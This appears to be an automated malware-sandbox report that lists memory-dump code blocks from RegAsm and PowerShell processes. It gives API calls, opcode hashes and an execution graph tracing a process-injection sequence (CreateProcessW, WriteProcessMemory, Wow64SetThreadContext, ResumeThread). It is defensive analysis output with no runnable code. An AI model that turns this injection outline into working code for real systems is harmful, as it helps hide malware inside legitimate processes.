                                                              • Instruction Fuzzy Hash: A2815B70A04B058FD764DF6AD04476ABBF5FF48710F04892ED88ADB650E774E85ACB90

                                                              Control-flow Graph: basic blocks 5952510-5952681; calls CreateWindowExW (rendered graph omitted)
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05952622
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 26903ddfcf52be56607f7772eda832af6dc9dd014831aa5e9655dc534b4eaf4f
                                                              • Instruction ID: a7ac9b151b9b5c353fac72c3e7782d163e805f125fd66c61dc6f2b73c8118bc9
                                                              • Opcode Fuzzy Hash: 26903ddfcf52be56607f7772eda832af6dc9dd014831aa5e9655dc534b4eaf4f
                                                              • Instruction Fuzzy Hash: 2941B0B5D00349DFDF14CF99C984ADEBBB5BF48310F24852AE819AB250D775A885CF90

                                                              Control-flow Graph: basic blocks 5954c70-5954d8c; calls CallWindowProcW (rendered graph omitted)
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05954D31
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 6a0f6ffb0e8c6e9c19c9399c9e0875ff32ec85aab1e84d7809c9ecae83b4f57b
                                                              • Instruction ID: 8637d37295008b63e166a364b45307ec7d051fd8a865c06b8df5bd015df46627
                                                              • Opcode Fuzzy Hash: 6a0f6ffb0e8c6e9c19c9399c9e0875ff32ec85aab1e84d7809c9ecae83b4f57b
                                                              • Instruction Fuzzy Hash: A44108B59003098FDB54CF99C448AAABBF5FB88314F24C859D919AB321D775A845CFA0
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0595E3D2), ref: 0595E4BF
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 5b2feb349b71b073d1161542a9595c359fd0ed0f30a65118d884dbc3ccfc71f1
                                                              • Instruction ID: c6599a189a440013a99d070fb5b1a3bd2f5cc39eb1e87ceb617a824926a2c31b
                                                              • Opcode Fuzzy Hash: 5b2feb349b71b073d1161542a9595c359fd0ed0f30a65118d884dbc3ccfc71f1
                                                              • Instruction Fuzzy Hash: 9A2157B1C042698FCB10DFA9D5447EEBBF8EF48320F1485AAD918B7350D7789985CBA1
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014A767F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 1df6fbae129148e19c4d83291c158512d2af03e8440389b484868601ce14bc37
                                                              • Instruction ID: 7a4c86ebd3df561bad0daba29b6a3bbc00ff5f144b6a3f8723d5bf62c1e34f0a
                                                              • Opcode Fuzzy Hash: 1df6fbae129148e19c4d83291c158512d2af03e8440389b484868601ce14bc37
                                                              • Instruction Fuzzy Hash: 9F21E3B5D002499FDB10CFAAD584AEEBBF4EB48320F14841AE918A7350D378A954CFA0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014A767F
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: dfa5a689930750ea71f6c7d98da54b4e960ebae6516721d361bba632cf1c22da
                                                              • Instruction ID: 4ae032aa5b44443a277defc4e042357b936ef9109c980c6fc37c624ad2cad370
                                                              • Opcode Fuzzy Hash: dfa5a689930750ea71f6c7d98da54b4e960ebae6516721d361bba632cf1c22da
                                                              • Instruction Fuzzy Hash: 9D21C4B5D002489FDB10CFAAD984ADEBFF4EB48320F14841AE918A7350D379A954CFA5
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 014A2433
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 56549a70f5190059c764f0e2fb977d913b59b8ff342ef36bf9f46f954abc2b5a
                                                              • Instruction ID: afca858a88f41e0f237416842d2bd3ae1db3e1858ab65167d1c842f8916af6e9
                                                              • Opcode Fuzzy Hash: 56549a70f5190059c764f0e2fb977d913b59b8ff342ef36bf9f46f954abc2b5a
                                                              • Instruction Fuzzy Hash: 112123B5D002098FDB14CFA9D844AEFBBF5BF88314F10842AE459A7260C778A941CFA1
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 014A2433
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3343068533.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_14a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 1f7a15254755465953c145248345de75b517d2ec763b14b91b7fa115be8ea58e
                                                              • Instruction ID: 16012d647924a1cea83a3d865880b26f2dcc1f349eaf4afff6f9239138aadddf
                                                              • Opcode Fuzzy Hash: 1f7a15254755465953c145248345de75b517d2ec763b14b91b7fa115be8ea58e
                                                              • Instruction Fuzzy Hash: 2B2104B5D002098FDB14DF9AC944AEEBBF5AF88310F10842AE519A7250CB78A945CFA1
                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0595E3D2), ref: 0595E4BF
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 09bf5eb8a8dd4ae8e3c1ef34751ba10540bfa41259743b93cf0ab052ac14f2fa
                                                              • Instruction ID: ed0ce436c70a4ddf52bf7f67a87d6e24b0695b74bce24606b96d806cb982716c
                                                              • Opcode Fuzzy Hash: 09bf5eb8a8dd4ae8e3c1ef34751ba10540bfa41259743b93cf0ab052ac14f2fa
                                                              • Instruction Fuzzy Hash: 731133B1C006599BCB10DF9AC5446AEFBF8EF48320F10816AE918B7240D778A954CFE1
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0595055E
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3375789757.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_5950000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: c6e7cb068bb47442c405fd6b2e70d7ea9127b7ced2fa15b626110dd1540dd93a
                                                              • Instruction ID: df8d423408fa8ef57b3b0e8f94ecc89dc3553637343396208fbfa2038d6f7035
                                                              • Opcode Fuzzy Hash: c6e7cb068bb47442c405fd6b2e70d7ea9127b7ced2fa15b626110dd1540dd93a
                                                              • Instruction Fuzzy Hash: 5911DFB6C046498FDB10CF9AD448BDEFBF8EB88724F14842AD919A7210D379A545CFA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: b219f97c59befcc447996f123535efb65487e9fa0dbb9ac385c153cb70c980d4
                                                              • Instruction ID: c84cb17fc128688c203b557924cc11de3dad794f1dec37d03ea5e5c92984671b
                                                              • Opcode Fuzzy Hash: b219f97c59befcc447996f123535efb65487e9fa0dbb9ac385c153cb70c980d4
                                                              • Instruction Fuzzy Hash: C2619D317241158FD744CF79C888E7A7BE9AF8962070584A9EA16CB361DB36EC40CBE1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d8bq
                                                              • API String ID: 0-3484500975
                                                              • Opcode ID: 96870b34944b7b1e32eb9137c2f3237d401d3f99020108ffd41fe8bd819ddb9e
                                                              • Instruction ID: 2e573faf0f7a39f274904ab695efc5c162128b26eeb1e0680a94e8ac222d796a
                                                              • Opcode Fuzzy Hash: 96870b34944b7b1e32eb9137c2f3237d401d3f99020108ffd41fe8bd819ddb9e
                                                              • Instruction Fuzzy Hash: B051F3357102048FC7659B39D828FBE7BA6EF84710F0445A9EA5ACB7A2DB74DC05CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q
                                                              • API String ID: 0-1259897404
                                                              • Opcode ID: f4c4907127bbeefa61004e560d7ff5ecb90601f13b0a1e3deeb18efeb98bd3ac
                                                              • Instruction ID: f321698df15c43901a0311de828a29c2d2467db7803614e17db150b757d3591b
                                                              • Opcode Fuzzy Hash: f4c4907127bbeefa61004e560d7ff5ecb90601f13b0a1e3deeb18efeb98bd3ac
                                                              • Instruction Fuzzy Hash: DF414C74620109DFDB54CF69D888E6A7BB6FF88320F004066FA168B361CB75DD40CBA1
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05f5826d27c9327364f9c2c0d8184d96a653c0f93edf577c71f9864278ffc142
                                                              • Instruction ID: a572756cdd517af8c3444c9e5e80a32999455bb1131fdbc0d271c035993c16e1
                                                              • Opcode Fuzzy Hash: 05f5826d27c9327364f9c2c0d8184d96a653c0f93edf577c71f9864278ffc142
                                                              • Instruction Fuzzy Hash: E821D435B043504FDB14DB38E818B5E7FA6ABC9620F1582A9D855AB3DADA38DC418B81
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46dfec5d6a669f5ceef746af4b4b0268152fdc8079aa155d78e7a4e6f369e567
                                                              • Instruction ID: 23da7fcdce2379bd38f6d8032ddb2f45e5bde9b916280db082dbadbf1eae30d7
                                                              • Opcode Fuzzy Hash: 46dfec5d6a669f5ceef746af4b4b0268152fdc8079aa155d78e7a4e6f369e567
                                                              • Instruction Fuzzy Hash: 5D319F35A1110E9FDB459F64D864EBE7BA2FB98650F008029FA0587361CB39CD61DBA0
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bea42e4b25399b21d7b1df3949beaaf23e4c3843bc95fb38cfb4961ec337887
                                                              • Instruction ID: 6a52ff90ba87f81a5269818322994e565d76339c863b3dac9cf6ad1465d05701
                                                              • Opcode Fuzzy Hash: 6bea42e4b25399b21d7b1df3949beaaf23e4c3843bc95fb38cfb4961ec337887
                                                              • Instruction Fuzzy Hash: 4321B0307202054BEB665B398454E3E399BAFC46A8F148039D606CB394EE6BCC42D3D5
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.3377008286.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_67f0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b11b7880b6cda4f3a50f9ce8fa73e20c162fea48530f4a8d9b0646df8f524d1
                                                              • Instruction ID: 68d071d6d5b1481416131ab1a2639851fa4b70195173a81216991c06dadf336f
                                                              • Opcode Fuzzy Hash: 7b11b7880b6cda4f3a50f9ce8fa73e20c162fea48530f4a8d9b0646df8f524d1

                                                              Execution Graph

                                                              Execution Coverage:10.5%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:23
                                                              Total number of Limit Nodes:1
                                                              execution_graph 4177 7ff848e86238 4179 7ff848e8622b 4177->4179 4178 7ff848e86246 4179->4177 4179->4178 4180 7ff848e89e19 WriteProcessMemory 4179->4180 4181 7ff848e89eb4 4180->4181 4197 7ff848e861f8 4199 7ff848e86201 4197->4199 4198 7ff848e86246 4199->4198 4200 7ff848e89e19 WriteProcessMemory 4199->4200 4201 7ff848e89eb4 4200->4201 4161 7ff848e895a9 4162 7ff848e895b8 4161->4162 4163 7ff848e8961b CreateProcessW 4161->4163 4162->4163 4164 7ff848e896b0 4163->4164 4165 7ff848e89829 4166 7ff848e89837 Wow64SetThreadContext 4165->4166 4168 7ff848e89981 4166->4168 4173 7ff848e89f19 4174 7ff848e89f27 ResumeThread 4173->4174 4176 7ff848e89ffc 4174->4176 4169 7ff848e89d2d 4170 7ff848e89d3b WriteProcessMemory 4169->4170 4172 7ff848e89eb4 4170->4172
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 598 7ff848e89d2d-7ff848e89d39 599 7ff848e89d44-7ff848e89df1 598->599 600 7ff848e89d3b-7ff848e89d43 598->600 603 7ff848e89df3-7ff848e89e16 599->603 604 7ff848e89e19-7ff848e89eb2 WriteProcessMemory 599->604 600->599 603->604 605 7ff848e89eb4 604->605 606 7ff848e89eba-7ff848e89f16 604->606 605->606
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 608 7ff848e86238-7ff848e86244 610 7ff848e8622b-7ff848e86233 608->610 611 7ff848e86246-7ff848e86256 608->611 610->608 612 7ff848e89d50-7ff848e89df1 610->612 616 7ff848e89df3-7ff848e89e16 612->616 617 7ff848e89e19-7ff848e89eb2 WriteProcessMemory 612->617 616->617 618 7ff848e89eb4 617->618 619 7ff848e89eba-7ff848e89f16 617->619 618->619
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 621 7ff848e89829-7ff848e89835 622 7ff848e89840-7ff848e898f4 621->622 623 7ff848e89837-7ff848e8983f 621->623 626 7ff848e89916-7ff848e8997f Wow64SetThreadContext 622->626 627 7ff848e898f6-7ff848e89913 622->627 623->622 628 7ff848e89981 626->628 629 7ff848e89987-7ff848e899d1 626->629 627->626 628->629
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64

                                                              Control-flow graph (rendered image not preserved): basic blocks 7ff848e895a9 to 7ff848e897a4; API call: CreateProcessW; internal call to 7ff848e897a5
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 8645749a93392b54e413d53306456e2e7db7e4774a473d3a33dd2b422f595b21
                                                              • Instruction ID: a3604c198e18fd7d2590633ad1a4520fef8951504a54b5fdc83b873725b7c1aa
                                                              • Opcode Fuzzy Hash: 8645749a93392b54e413d53306456e2e7db7e4774a473d3a33dd2b422f595b21
                                                              • Instruction Fuzzy Hash: 9551F730908A1D8FDBA8EF18D895BE9B7F1FB59310F5041AAD40DE3291DB35AA81CF45

                                                              Control-flow graph (rendered image not preserved): basic blocks 7ff848e89f19 to 7ff848e8a040; API call: ResumeThread
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2600619312.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848e80000_powershell.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 6177f918c19fb5766bd22e73b822c75517f06bb8c8daa40aa17d7eb328987f86
                                                              • Instruction ID: 103822c9164b3e45a87d8312f6c0a16d688758aa8cf5b664860b5bb96b5cf9dd
                                                              • Opcode Fuzzy Hash: 6177f918c19fb5766bd22e73b822c75517f06bb8c8daa40aa17d7eb328987f86
                                                              • Instruction Fuzzy Hash: A6416A70D0CA4C8FDB59DF98D885BADBBB0FF5A310F1041AED049E7252DA74A885CB41

                                                              Control-flow graph (rendered image not preserved): basic blocks 7ff848f5052d to 7ff848f509a8; no API calls recorded
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22ce1f0f70b34327a9555bf80e9892224968463debe9e6c662a11f446c5a73f1
                                                              • Instruction ID: 09172f25e62c4ab15118356abdc70858f21e60a249805986f2519ec135d33bc5
                                                              • Opcode Fuzzy Hash: 22ce1f0f70b34327a9555bf80e9892224968463debe9e6c662a11f446c5a73f1
                                                              • Instruction Fuzzy Hash: E8F13331A0EBC54FE75ABB285855571BBE1EF96350F1801FFE448C71D3EA18A806C396

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1fb5b8d906eb35c71cf16e973ed0cba60bff609ee1e9a2d71f88c1125524298
                                                              • Instruction ID: bf9488bac79f7b40b1d853236dbb5839b3c3889bb6adb5acd66e2324f6aeca12
                                                              • Opcode Fuzzy Hash: d1fb5b8d906eb35c71cf16e973ed0cba60bff609ee1e9a2d71f88c1125524298
                                                              • Instruction Fuzzy Hash: 04611632E1EE864FF79AA72C14512B9E6D1EF456A8F5801BAD00EC71D3EF18BC448359

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e63f4f3dc643ac245ffa85cb2c9bbf5a152489fa020a1cbbf8e058ef2963613d
                                                              • Instruction ID: 2fa51fe1827e32f11c7408b4a93a24752711cf7c0d677efd9861d625ef5d18e1
                                                              • Opcode Fuzzy Hash: e63f4f3dc643ac245ffa85cb2c9bbf5a152489fa020a1cbbf8e058ef2963613d
                                                              • Instruction Fuzzy Hash: 5051F632E1EE864FF7A9A72C14516B9A6D1FF45794F5801BAC01EC71D3DE08BC448399
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c730288c7c91bd0a24ab16720f83e77e91069375eeeb6cc02c71749d4c978a4
                                                              • Instruction ID: 6956bb5ab1cc923cd6288d16ffffab7577cc2847e2bb913c608c932dbaa14920
                                                              • Opcode Fuzzy Hash: 0c730288c7c91bd0a24ab16720f83e77e91069375eeeb6cc02c71749d4c978a4
                                                              • Instruction Fuzzy Hash: 1F41F532D1EB8A0FE767673808281B5BBE5DF52798F0901BAD44CC71D3EA186C4A8359

                                                              Control-flow graph (rendered image not preserved): basic blocks 7ff848f514fa to 7ff848f516a0; no API calls recorded
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1be55629a068b64017624602cd3c4a8c68f55a5d031d86c1ff0784ba4b7d0f2d
                                                              • Instruction ID: 8085a6154ec5eb0a506d923196eb6e98149cac560298fa113f4d9d27ad282481
                                                              • Opcode Fuzzy Hash: 1be55629a068b64017624602cd3c4a8c68f55a5d031d86c1ff0784ba4b7d0f2d
                                                              • Instruction Fuzzy Hash: DB41E632E1EE875FF39AB72C045527595D1EF512A8F9801BAD41EC31D3EF1CAC844209

                                                              Control-flow graph (rendered image not preserved): basic blocks 7ff848f5104a to 7ff848f511b6; no API calls recorded
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2601897005.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_7ff848f50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01f457d3602ea3ef58b4094738958aca710cdff3aa8a81117397699de045a8e3
                                                              • Instruction ID: c3e0d783f8caa9e927c475e86f10bed669788a2bca89629f28f1af26b5b7cda8
                                                              • Opcode Fuzzy Hash: 01f457d3602ea3ef58b4094738958aca710cdff3aa8a81117397699de045a8e3
                                                              • Instruction Fuzzy Hash: B631CE32E1EE864FF7A9772C14652B8A5D1FF416A9F5801BAD419C31D3DE0CAC844319
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2537266518.00007FF848F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ff848f60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8cef9888661b438cd32c2d8b77e667a187db20ba94b626a6740a885c70466958
                                                              • Instruction ID: 690350359374311f5142cc0ea35cbc073198c5286017cd6d2cbfb5b381a52e1b
                                                              • Opcode Fuzzy Hash: 8cef9888661b438cd32c2d8b77e667a187db20ba94b626a6740a885c70466958
                                                              • Instruction Fuzzy Hash: 39D14831E0EACA5FE756AB6858545B57BE0FF06390F0802FAD44DDB1D3DB28A806C355
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2535420658.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_7ff848e90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction ID: 29c1cfa6bac51b81d075f13f06edf054ad2643bd55ff8ec3c5d015a1cc12a693
                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction Fuzzy Hash: 6C01677115CB0D4FDB44EF0CE451AA6B7E0FB95364F10056DE58AC3661DB36E882CB45
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq
                                                              • API String ID: 0-725504367
                                                              • Opcode ID: 02f4e0a86d062dc70bc3d5900269e28f9bd3bb961dc7916561e4001a2aec99e3
                                                              • Instruction ID: 400a141fca914e9ca5152742d73c53ed313d1f46ca4144200048ad722516d323
                                                              • Opcode Fuzzy Hash: 02f4e0a86d062dc70bc3d5900269e28f9bd3bb961dc7916561e4001a2aec99e3
                                                              • Instruction Fuzzy Hash: 8221E430E052098FDB04EFB8C4653AE7BB5FF84704F2444A9D44A9B285EB359E06CBC1
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_29a0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 849c33d4a069fa660d2b4dee21bb8436b7568ff38c9f9a36b51cd1ef91266a31
                                                              • Instruction ID: c87a77b5caa08f1a33cd5edaab862e8869c161fd2d613c3a3f9d42a881c20f4b
                                                              • Opcode Fuzzy Hash: 849c33d4a069fa660d2b4dee21bb8436b7568ff38c9f9a36b51cd1ef91266a31
                                                              • Instruction Fuzzy Hash: 847193357002058FCB19EF78E568A6E7BE6FF88604B508928D04A9B7A9DF359C05CF81
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2386359502.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
